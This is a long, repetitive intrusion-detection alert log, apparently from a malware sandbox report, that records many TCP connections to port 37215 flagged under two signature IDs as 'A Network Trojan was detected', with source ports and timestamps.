          SID:2829579
          Source Port:54046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338511
          SID:2829579
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367122
          SID:2829579
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300057
          SID:2835222
          Source Port:43688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620352
          SID:2835222
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272370
          SID:2829579
          Source Port:39920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974011
          SID:2829579
          Source Port:55428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287547
          SID:2829579
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327847
          SID:2829579
          Source Port:55466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147289
          SID:2829579
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553318
          SID:2829579
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680315
          SID:2829579
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270312
          SID:2829579
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325953
          SID:2835222
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325763
          SID:2829579
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213530
          SID:2835222
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067258
          SID:2829579
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225774
          SID:2829579
          Source Port:38748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730310
          SID:2829579
          Source Port:39976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244677
          SID:2835222
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475292
          SID:2829579
          Source Port:56964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272918
          SID:2829579
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070457
          SID:2835222
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280932
          SID:2829579
          Source Port:34376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196904
          SID:2829579
          Source Port:56654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593138
          SID:2835222
          Source Port:46674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211306
          SID:2829579
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180481
          SID:2835222
          Source Port:59154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325761
          SID:2835222
          Source Port:36634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177547
          SID:2835222
          Source Port:33846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914727
          SID:2829579
          Source Port:41310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195968
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073287
          SID:2835222
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854133
          SID:2835222
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182727
          SID:2829579
          Source Port:51502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081344
          SID:2835222
          Source Port:46770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482527
          SID:2835222
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273310
          SID:2835222
          Source Port:37646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324170
          SID:2835222
          Source Port:56908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543550
          SID:2835222
          Source Port:37898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876544
          SID:2835222
          Source Port:55244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294670
          SID:2829579
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547840
          SID:2835222
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685007
          SID:2829579
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065722
          SID:2829579
          Source Port:37162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809291
          SID:2829579
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267092
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941664
          SID:2835222
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373200
          SID:2829579
          Source Port:45688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780764
          SID:2835222
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2829579
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857225
          SID:2835222
          Source Port:49950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224256
          SID:2835222
          Source Port:57296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470864
          SID:2829579
          Source Port:58768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010531
          SID:2829579
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399953
          SID:2835222
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652843
          SID:2835222
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550620
          SID:2829579
          Source Port:40768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062865
          SID:2835222
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066198
          SID:2829579
          Source Port:38050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107362
          SID:2829579
          Source Port:58638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039204
          SID:2835222
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652273
          SID:2835222
          Source Port:44342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959687
          SID:2835222
          Source Port:59486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328886
          SID:2835222
          Source Port:50204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650038
          SID:2829579
          Source Port:49680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178915
          SID:2835222
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743496
          SID:2835222
          Source Port:46236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492697
          SID:2829579
          Source Port:58678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931898
          SID:2829579
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876724
          SID:2835222
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975952
          SID:2835222
          Source Port:33382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932933
          SID:2829579
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755918
          SID:2829579
          Source Port:53322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525452
          SID:2835222
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208251
          SID:2829579
          Source Port:51322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154730
          SID:2835222
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843157
          SID:2829579
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608863
          SID:2835222
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196044
          SID:2829579
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922649
          SID:2835222
          Source Port:33194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879025
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678355
          SID:2829579
          Source Port:46296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497520
          SID:2835222
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978238
          SID:2835222
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187424
          SID:2829579
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863862
          SID:2835222
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223478
          SID:2835222
          Source Port:43838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141617
          SID:2835222
          Source Port:53342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820532
          SID:2829579
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594833
          SID:2835222
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732122
          SID:2835222
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175476
          SID:2835222
          Source Port:55578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224975
          SID:2835222
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205596
          SID:2835222
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422531
          SID:2829579
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178554
          SID:2829579
          Source Port:51266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202683
          SID:2829579
          Source Port:38220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182760
          SID:2829579
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177165
          SID:2829579
          Source Port:33410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244519
          SID:2829579
          Source Port:46952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537699
          SID:2835222
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590905
          SID:2835222
          Source Port:55132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794220
          SID:2829579
          Source Port:36182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708889
          SID:2829579
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329057
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177257
          SID:2835222
          Source Port:38348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216340
          SID:2835222
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242071
          SID:2829579
          Source Port:53652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772941
          SID:2835222
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205461
          SID:2829579
          Source Port:48192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272813
          SID:2835222
          Source Port:48368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841065
          SID:2835222
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972206
          SID:2835222
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.108207
          SID:2829579
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736706
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496682
          SID:2829579
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977356
          SID:2835222
          Source Port:48284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234102
          SID:2835222
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336656
          SID:2829579
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196429
          SID:2829579
          Source Port:35226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215354
          SID:2835222
          Source Port:56996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266448
          SID:2829579
          Source Port:52682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742369
          SID:2829579
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141722
          SID:2829579
          Source Port:58582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048836
          SID:2835222
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707777
          SID:2835222
          Source Port:47726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543055
          SID:2829579
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187963
          SID:2829579
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725181
          SID:2829579
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366055
          SID:2835222
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216283
          SID:2829579
          Source Port:43044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268675
          SID:2829579
          Source Port:57938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102234
          SID:2835222
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291787
          SID:2835222
          Source Port:53524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102813
          SID:2835222
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172114
          SID:2829579
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485727
          SID:2829579
          Source Port:53884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876565
          SID:2829579
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325924
          SID:2829579
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326078
          SID:2835222
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551104
          SID:2829579
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487457
          SID:2835222
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669319
          SID:2835222
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814049
          SID:2829579
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466236
          SID:2829579
          Source Port:56704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048281
          SID:2829579
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162292
          SID:2835222
          Source Port:59676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530391
          SID:2835222
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922946
          SID:2829579
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722411
          SID:2829579
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151888
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299536
          SID:2835222
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178940
          SID:2829579
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068148
          SID:2829579
          Source Port:46670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807888
          SID:2829579
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943316
          SID:2835222
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146297
          SID:2835222
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283691
          SID:2835222
          Source Port:33652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339755
          SID:2829579
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243653
          SID:2835222
          Source Port:57382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976249
          SID:2835222
          Source Port:58968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138171
          SID:2829579
          Source Port:47300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713420
          SID:2829579
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739803
          SID:2829579
          Source Port:38488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176499
          SID:2829579
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.500080
          SID:2829579
          Source Port:40752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070526
          SID:2835222
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998368
          SID:2829579
          Source Port:43856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332011
          SID:2829579
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357199
          SID:2829579
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069484
          SID:2829579
          Source Port:53636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231626
          SID:2835222
          Source Port:51596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213295
          SID:2835222
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115657
          SID:2835222
          Source Port:38808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707848
          SID:2829579
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561035
          SID:2835222
          Source Port:48994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543201
          SID:2829579
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862117
          SID:2835222
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989596
          SID:2835222
          Source Port:39606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923678
          SID:2829579
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542346
          SID:2829579
          Source Port:46280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698196
          SID:2835222
          Source Port:37608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186065
          SID:2835222
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154084
          SID:2829579
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143121
          SID:2835222
          Source Port:44884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037245
          SID:2829579
          Source Port:60198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839498
          SID:2835222
          Source Port:60566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635891
          SID:2835222
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227053
          SID:2835222
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990491
          SID:2829579
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484637
          SID:2835222
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997024
          SID:2835222
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615148
          SID:2835222
          Source Port:48278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125684
          SID:2835222
          Source Port:46426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225938
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845515
          SID:2835222
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157009
          SID:2829579
          Source Port:39462
          Destination Port:37215
